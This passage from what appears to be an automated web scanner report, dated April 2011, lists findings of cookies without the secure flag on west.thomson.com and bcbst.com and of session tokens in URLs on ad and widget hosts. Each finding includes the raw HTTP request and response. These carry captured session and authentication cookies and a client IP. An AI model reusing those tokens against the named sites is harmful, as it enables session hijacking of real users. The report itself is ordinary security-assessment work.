Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; SbasketVw=T; s_cc=true; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%5D; s_ppv=66; c_m2=1; c=undefined645229L86530undefined; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=Bankruptcy%20Exemption%20Manual%2C%202010%20ed.%20%28West%27s%26%23174%3B%20Bankruptcy%20Series%29; s_sq=thwest%3D%2526pid%253DBankruptcy%252520Exemption%252520Manual%25252C%2525202010%252520ed.%252520%252528West%252527s%252526%252523174%25253B%252520Bankruptcy%252520Series%252529%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BshowPopupBubble%252528%252527ctl00%252524placeHolderTopNavigation%252524placeHolderContent%252524ctl00%252524popu%2526oidt%253D2%2526ot%253DIMAGE; UserSiteIdIdentifier=; .WTCAUTH=A67F8B510CDBD58F31C838E207550441CEB1CACBCF20772FABFD044A384585124BA1797DC696288EE75DD493FCDA4E346EC5188BF838DB30477D657A2B3353079A4A75CC7ADF7B32C6DFC8CFB3EE9A58DA7FA502513F8B57574483FBFFFB85B197C174609DEBF07D119AF640ED1BDE7FA911D2469C6D1F6E4CFA3E4CD98E5EDA89F130ADB2B2BB195DEF71DA3D31374DF57A62DF7A9EB3103E3E90B8657C457C5A7DBC308AB465C8B88F9F9BB15ECBD076348E09B023DFF9E2C2D12FFA4890F4C4A7A979AA2F883A180B60FA2CEEB1997ED8D19C4A177200624EEB34DD1B8E1517173999

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:04:16 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=31ACA283401DA17A05061FA0F538B8F86B7C65D5AB4A89A80E18F25BB77CEE40DB1033D80460E2C8E2A5472BD6CA74D385343046E024D8A9016A49A4B932722E3A8B6E13E322F378E10C55CE5C6D739F961129503F73317944D18CF6FC365195204B6B3DDC328162B313B90606D91909B6A1C8F543CA6E9896E8054786853477E91BF7A0F5CB5530F37A45203DF832D4841547B09AF64E9712AA65C817E0A78CBBD365CBD13686366C4F93CC55EB97CDAC4CE43C02380AC22DBB7C12A6CC859B899F5ADFFCC303480CB636B2447BED43ECFD31E730F41D8F75BCF8299C965EDBEDB25AD4; path=/
Cache-Control: private
Expires: Mon, 25 Jul 2011 03:24:16 GMT
Content-Type: text/css; charset=utf-8
Content-Length: 4551

.Header_Org_SideBar1{background-image:url('https://images.west.thomson.com/organizations/headers/sidebar1.jpg');margin-top:2px;height:85px;width:241px}.Header_Org_SideBar2{background-image:url('https:
...[SNIP]...

10.10. https://west.thomson.com/store/Promotions/EmailPreferences/Login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://west.thomson.com
Path:   /store/Promotions/EmailPreferences/Login.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /store/Promotions/EmailPreferences/Login.aspx?Mstr=wtc&PromCode=571419&FindingMethod=Navigation HTTP/1.1
Host: west.thomson.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; UserSiteIdIdentifier=

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:04:15 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=A85C2F3C93F050051A95CC95A3B0888C03B9DBEF0A026D745D0656E2E3DE853394140B6D80EEE33684BAC22241C10BCEC46D800215998CBC7CB21197B52E754E19FAA6C1F1725A6249D03181F66A430ECE47F662E7EF119243B001BEA25F850311DCB9495BBDE849BAEAE38CFAF69EE6C71B979EC9A46B08E8C5B362E255E6FCD960E943F41886886E045C4EB97A5121632E495A2DE980E64EC33F053829F75AEDFBDE371B36DC072FBB362065481E66F8EFF61623D579526A71AC8DD9F30FF1BFAD99A5FA5D2AE551F509B6E57AC0127A7E82DD4063747DCDE458BCBBFA35D0CE53B82A; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 69722


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...

10.11. https://west.thomson.com/store/secure/EmptyBasket.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://west.thomson.com
Path:   /store/secure/EmptyBasket.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /store/secure/EmptyBasket.aspx HTTP/1.1
Host: west.thomson.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; s_cc=true; c_m2=1; c=undefined645229L86530undefined; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%5D; gpv_pn=Bankruptcy%20Exemption%20Manual%2C%202010%20ed.%20%28West%27s%26%23174%3B%20Bankruptcy%20Series%29; s_ppv=0; s_sq=%5B%5BB%5D%5D; UserSiteIdIdentifier=; .WTCAUTH=0D1C43F14C3D0360D4C56BDD0D49E3A1E347C13F76ADC1B282235271457FAC648FB37FE6B223762A24E6CB268609BC8463ECB71442613CE6C286443DD8C796AD188F8568D73785118A509021BEABBD4E55D10E5F1E3A4F4A3F1B558AB2332C44A56F489B0571AEA92276AE792D9D8761A0FBB7322D072015D4B719941EFD8FCB5CDB63E1CEF01EF859C876D1DA920B7EB3539BA4B4D934B5A3CF2F56BB805BA3F3435E9F173B50A3D9F7C34D0C8E7180A2F74BC8118F96769794F6D4C7A36DCE92EEA8FE38E72E95AF86A85ADB9338C9E73EDA3652910D79D1A7D57B6EF7422F00DB82A9

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:06:52 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=79CBDB991A6459338884A46B49D0105C145D63087A0F6EA1AF1008AF8F10A6BE20B4B11D124F705A3B3E14AC22EC73DD213F5F9EEB5214BC1762EE7929A0F454C61A0BDCF1DEC78E1A8885681779E756F6C33BB53E5D00DC20A327C71B7A18A01CD2DEC0CB430995B2D528EAE5EDE656A06490C12141D8DC1BDB52EA377E9C528F52835D9BB8C6526E44BC00F17481EEE8BAF4CEFD033D588FC1950953DF71D7BEC464ACA7CC296D962C2F89E8B7BF9E2164F2A2485B2AD03B442B72330D47CEE8F0DEFDB9FFFF7F71AE584B4FEA6F98140E539AF54249B185FB8811D025A5E2F4D81C75; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 68662


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta c
...[SNIP]...

10.12. https://west.thomson.com/store/secure/ShippingInfo.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://west.thomson.com
Path:   /store/secure/ShippingInfo.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /store/secure/ShippingInfo.aspx?CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=22061301%3b&PromCode=600582C43552&PromType=internal&Ctl00%24placeHolderTopNavigation%24WeststoreHeader%24cmbBucketCategory=adv_bkt_Books&Ctl00%24placeHolderTopNavigation%24WeststoreHeader%24txtSearch=keyword%2c+title%2c+author+or+ISBN&Ctl00%24placeHolderTopNavigation%24placeHolderContent%24basketItems%24ctl00%24txtQuantity=1&ChkCCMe=CC+Me&PageTitle=cart HTTP/1.1
Host: west.thomson.com
Connection: keep-alive
Referer: http://west.thomson.com/store/secure/ShoppingBasket.aspx?CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=22061301%3b&PromCode=600582C43552&PromType=internal
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; SbasketVw=T; s_cc=true; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%5D; s_ppv=66; c_m2=1; c=undefined645229L86530undefined; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=Bankruptcy%20Exemption%20Manual%2C%202010%20ed.%20%28West%27s%26%23174%3B%20Bankruptcy%20Series%29; s_sq=thwest%3D%2526pid%253DBankruptcy%252520Exemption%252520Manual%25252C%2525202010%252520ed.%252520%252528West%252527s%252526%252523174%25253B%252520Bankruptcy%252520Series%252529%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BshowPopupBubble%252528%252527ctl00%252524placeHolderTopNavigation%252524placeHolderContent%252524ctl00%252524popu%2526oidt%253D2%2526ot%253DIMAGE; UserSiteIdIdentifier=; .WTCAUTH=9DFF38C2ED245A836B638A4FD2BB05048EFDFD2A3F3BC8DC4D0876357DAC06B163234E108A8F0DA6FFB919F8831205FF1893BF274F77770E9447A6CF6832F99911CAEA4F06343A555BDF7037EBDAD0392A3B821D6A252C115D9D10A1FD2B10DE395F8581D4BBE49B8B4EF6A088A00BE982BA5CBAAC1C23CD6D40E8E10C4A8CB90101D3CE531D7618D4A99EC6ED09D86A6A87BEB92C84EBB5541C5F4267CA16C317ED73CD9AD52E9BCFFCFA39E7A4F7561999EF701967F4FAEE3513AC9E115F783D6CA97286E2B3D06563DA39F267FA170B8C51C76EEB06DDD6F99A112D49B9ED48435EDE

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:04:45 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=C92933A45E8BBE47C7EEF54F80B6D25789CF3B0DE11279B4960956BC8BB0E345579BADF326956E9721B67D71932107D3B64238D6EE6707D06C81817121C5953C161DDD49619F87B8AE2E421C792976F48CA556F7DB0C834EB3BE231FCF4A767E58A07AA7485840E793C3A65F7DEB1BA7BD4CA2E971C144356D50FC6DD68AFCB7569D943E22EBDA2359D2DDAFEEB65197678B43B591B46F28E9EA05EC9F8FE84A521E37C1F57160F4EE7D67E36501BABC3987B29619274E9EBC26949903E1FDAEC56DB8129C91303E8A4BE5A28D8839FB0A532C6B8B24419839BF14AB2C51AD3259D6DF7F; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 134558


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta c
...[SNIP]...

10.13. https://west.thomson.com/store/secure/ShippingLocation.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://west.thomson.com
Path:   /store/secure/ShippingLocation.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /store/secure/ShippingLocation.aspx?CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=22061301%3b&PromCode=600582C43552&PromType=internal&Ctl00%24placeHolderTopNavigation%24WeststoreHeader%24cmbBucketCategory=adv_bkt_Books&Ctl00%24placeHolderTopNavigation%24WeststoreHeader%24txtSearch=keyword%2c+title%2c+author+or+ISBN&Ctl00%24placeHolderTopNavigation%24placeHolderContent%24basketItems%24ctl00%24txtQuantity=1&ChkCCMe=CC+Me&PageTitle=cart HTTP/1.1
Host: west.thomson.com
Connection: keep-alive
Referer: http://west.thomson.com/store/secure/ShoppingBasket.aspx?CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=22061301%3b&PromCode=600582C43552&PromType=internal
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; SbasketVw=T; s_cc=true; c=undefined571422undefined; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%5D; s_ppv=66; c_m2=1; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=Shopping%20Cart; s_sq=thwest%3D%2526pid%253DShopping%252520Cart%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257Btry%25257Bctl00%252524placeHolderTopNavigation%252524placeHolderContent%252524btnProceedBottomHideSub%2526oidt%253D2%2526ot%253DIMAGE; UserSiteIdIdentifier=; .WTCAUTH=FDCDD3CCDE1E864402B9FC99C17C5B887E4F142C7E539940508F9F7479A6A6F433A5B1298DA99CBBD01CC94400DE585D91C0BC2044A5DA3945B77A521C66DF4338A0F22A9AE831BC4D28B1B360FFA8BC5F7FEFCCCD8455667134A5A3C8102426B33E2E3C145412DD2FC7BAE2D1CF511058AF4AC6C8158E791D929260CFD17BFDF9A91806384EB9892622A5C4D4B2F99ACA7BB96849E4E1F35EDDBE997CF3F1A087FAD644670217520402D18C4C7DC1B3E409FCCFD1749D5356AF72C2DE92A54626B4737812FE5F26773127B302BF70BC002DA3B3EDC640107FA24DBEFD453411A2E9878D

Response

HTTP/1.1 302 Found
Date: Tue, 26 Apr 2011 20:04:30 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Location: https://west.thomson.com/store/secure/ShippingInfo.aspx?CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=22061301%3b&PromCode=600582C43552&PromType=internal&Ctl00%24placeHolderTopNavigation%24WeststoreHeader%24cmbBucketCategory=adv_bkt_Books&Ctl00%24placeHolderTopNavigation%24WeststoreHeader%24txtSearch=keyword%2c+title%2c+author+or+ISBN&Ctl00%24placeHolderTopNavigation%24placeHolderContent%24basketItems%24ctl00%24txtQuantity=1&ChkCCMe=CC+Me&PageTitle=cart
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=317228B45D05EAA4FDEA746AAC7BE43F8561B2A283AF9A5155875AD255B46C71677CBC8EA62E3B5CEE39AF7C22128258C3732C9D175B9FEACDC5F2E6FFE5693065611A01C05A38F1E5D84493B7967DC232D933B9102443C77BEF9BFF3E01C8CD15A6463509AC6370E2EC7A2CAB65CC2599C96298961A97FB8BF6C92BC20D040744C918ED8E0C8E71DAD17C3B61362A014C184546A8B80643B718BDEA4BE3456AA6D427C23674A519C4FBE32A9E223D084ADFF81BB8C05F51E37982CC1060BAA31A729FFE99953D24C027132FDB03700957643439D6CC8600B3DA1DBADB71D5F3DB402F3B; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 614

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://west.thomson.com/store/secure/ShippingInfo.aspx?CartEventsAndParams=scAdd%3a+22061301%3b&amp;CartContents=220
...[SNIP]...

10.14. https://west.thomson.com/support/customer-service/order-info.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://west.thomson.com
Path:   /support/customer-service/order-info.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /support/customer-service/order-info.aspx HTTP/1.1
Host: west.thomson.com
Connection: keep-alive
Referer: https://west.thomson.com/store/Promotions/EmailPreferences/Login.aspx?Mstr=wtc&PromCode=571419&FindingMethod=Navigation
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; SbasketVw=T; UserSiteIdIdentifier=; .WTCAUTH=E76869171E1A0ADDDC87DE0666682051A5ABA524C2901C7CCEF31A6788A7A438C98C00E7ABD27B50057AA9B35AF82318BE32CAAF21BCE46BA3E3E2EF6BAD7265022CF6605B0D106AF37CB15E717B49BE7FA125545B49CD98D1796358E96925E259D28F2A8CB5B16681BF5B9DE5EB533CEFC7E936BC98024D18199973772A2B0420054643FF9639F13C27CBBB80C1152B2BC7EF70BDEC6C72A6C3ED2F16912510EBC9C641BEB2DCBD2784D94A08DAC3A2CB0C92EBE86CA6DAE5A52262E83175C215F1D237D9058600C65D041AC94F24F8BD7FAFEA186A82F05284BBAB97540DA15E7C4840; s_cc=true; s_ppv=100; c_m2=1; c=undefined571419undefined; SC_LINKS=store%3Apromotions%3Aemailpreferences%3Alogin%5E%5EFree%20Ground%20Shipping%5E%5Estore%3Apromotions%3Aemailpreferences%3Alogin%20%7C%20Free%20Ground%20Shipping%5E%5E; s_ev48=%5B%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%2C%5B%27Referrers%27%2C%271303849270372%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849306606%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849781175%27%5D%5D; gpv_pn=store%3Apromotions%3Aemailpreferences%3Alogin; s_sq=thwest%3D%2526pid%253Dstore%25253Apromotions%25253Aemailpreferences%25253Alogin%2526pidt%253D1%2526oid%253Dhttps%25253A//west.thomson.com/support/customer-service/order-info.aspx%252523freeshipping%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:43:57 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: .WTCAUTH=1A21DC8B98A96EC21459B14B79587A583EC2F9BC37D2E75B5317EF0E65FAFEF6730683DB17DCF2BE06F0B1B98854DE5A707FC465E78510565D9EB9DAE71D857891B9157BA899B658EA734F816E3CE32760B05F6B24F34F4DF7A20D01665DF7E18DCAAC70E57C6EDF44A0197593C73CA0FAE6C559214D35FC361C5715FE43DBF19C70EBD085C78E9E5F286FC92ED8B559596ABC60CEFF4372C361E9E899AF7753D44DE2EF1A434F6907AE0EEE63371718A38CBFF23D5698B65E6F218C4AEADA2868A458441D2D6450C6DDD153EDB3A2CE7A069305EEEB72793F81C52FB84EB011536FEF0B; expires=Tue, 26-Apr-2011 21:13:49 GMT; path=/; HttpOnly
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=62C8AFF94277E664484BBE7EC8277401DE5ADF5C5AEAF45D558739ADCD8069717EDC476F9611DA2668E59CB60B963048A7292391B9104F44FFCFB680230472EE9A68B087279430B80A9137BCF51FCBBE8CAA2B5135B21DAB33E2FF00B71448413EC9C7D9166F621CB8C527C88854A6B0E4DFD5CD34D4666CDACDA3442EF9704AA677452920C07B5940C397045601366D36704513C6FE9B69419D140474085B16735382FEB803D48FC173BBAFD3334424BF0894189520BF2901A304307E3DC9E63E08D54BB0A62CFE50A8B440B11838DBAA606EC4F2C964E593D9C23819FB20FA690F28E5; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 87568


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><m
...[SNIP]...

10.15. https://www.bcbst.com/accounttools/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bcbst.com
Path:   /accounttools/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /accounttools/ HTTP/1.1
Host: www.bcbst.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQQACTSCR=BEILKDCDMNMDFLDEAJBPMOCL; TLTSID=7F1898414E7D09A8923A98850107EF43; NSC_xxx.cdctu.dpn!80=ffffffff099f143645525d5f4f58455e445a4a423660; JSESSIONID=0000l6JFMG0zkOQi8ALpYNU9n7W:148u7ts85; NSC_xxx.cdctu.dpn!443=ffffffff099f143645525d5f4f58455e445a4a42378b; WT_FPC=id=173.193.214.243-104623456.30147664:lv=1303849539512:ss=1303849513702

Response

HTTP/1.1 302 Redirect
Date: Tue, 26 Apr 2011 20:25:50 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: Calling_URL=https://www.bcbst.com:443/accounttools/; path=/; domain=.bcbst.com;
Location: https://www.bcbst.com/secure/public/InvalidAccess.shtm


11. Session token in URL  previous  next
There are 25 instances of this issue:


11.1. http://bh.contextweb.com/bh/set.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /bh/set.aspx?action=add&advid=2532&token=AMQU2 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.widgetbox.com/mobile/builder/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|536088.914804995789526.0|535461.2931142961646634775.1; V=wOebwAz4UvVv; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1
CW-Server: cw-web83
Set-Cookie: V=wOebwAz4UvVv; Domain=.contextweb.com; Expires=Fri, 20-Apr-2012 21:46:55 GMT; Path=/
Set-Cookie: cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2; Domain=.contextweb.com; Expires=Wed, 30-Mar-2016 21:46:55 GMT; Path=/
Content-Type: image/gif
Date: Tue, 26 Apr 2011 21:46:55 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

11.2. http://i.widgetserver.com/ip/origin==http%3A%2F%2Fimg.widgetbox.com%2Fscreenshot%2F10%2F00b6be16-496c-476e-ba09-45115835efdf.png%3F22&&w==105&&h==158&&type==fill  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://i.widgetserver.com
Path:   /ip/origin==http%3A%2F%2Fimg.widgetbox.com%2Fscreenshot%2F10%2F00b6be16-496c-476e-ba09-45115835efdf.png%3F22&&w==105&&h==158&&type==fill

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /ip/origin==http%3A%2F%2Fimg.widgetbox.com%2Fscreenshot%2F10%2F00b6be16-496c-476e-ba09-45115835efdf.png%3F22&&w==105&&h==158&&type==fill?token=d654f174116d5feddd222fa610dddcaae5e0ff3c0000012f8ec04952 HTTP/1.1
Host: i.widgetserver.com
Proxy-Connection: keep-alive
Referer: http://www.widgetbox.com/mobile/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
